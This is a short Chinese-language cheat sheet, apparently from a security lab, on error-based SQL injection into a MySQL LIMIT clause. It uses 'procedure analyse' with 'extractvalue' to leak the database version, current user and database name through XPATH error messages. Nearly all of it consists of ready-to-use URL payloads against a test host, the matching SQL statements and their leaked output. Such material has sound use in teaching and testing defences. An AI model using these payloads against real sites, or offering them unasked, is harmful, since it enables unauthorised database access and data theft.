0x00 记忆方式
limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,payload)),1);
在有order by 的limit 注入我就只会注入一点基本数据了。。
0x01 爆数据库版本
web语句: http://www.test.com/limit_sql.php?limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
数据库语句: select * from users ORDER BY id limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
mysql> select * from users ORDER BY id limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
ERROR 1105 (HY000): XPATH syntax error: ':5.5.29'
0x02 爆当前连接用户
web语句: http://www.test.com/limit_sql.php?limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1)
数据库语句: select * from users ORDER BY id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);
mysql> select * from users ORDER BY id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1);
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
0x03 爆当前连接的数据库
web语句: http://www.test.com/limit_sql.php?limit=1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)
数据库语句: select * from users ORDER BY id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1);
mysql> select * from users ORDER BY id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1);
ERROR 1105 (HY000): XPATH syntax error: ':security'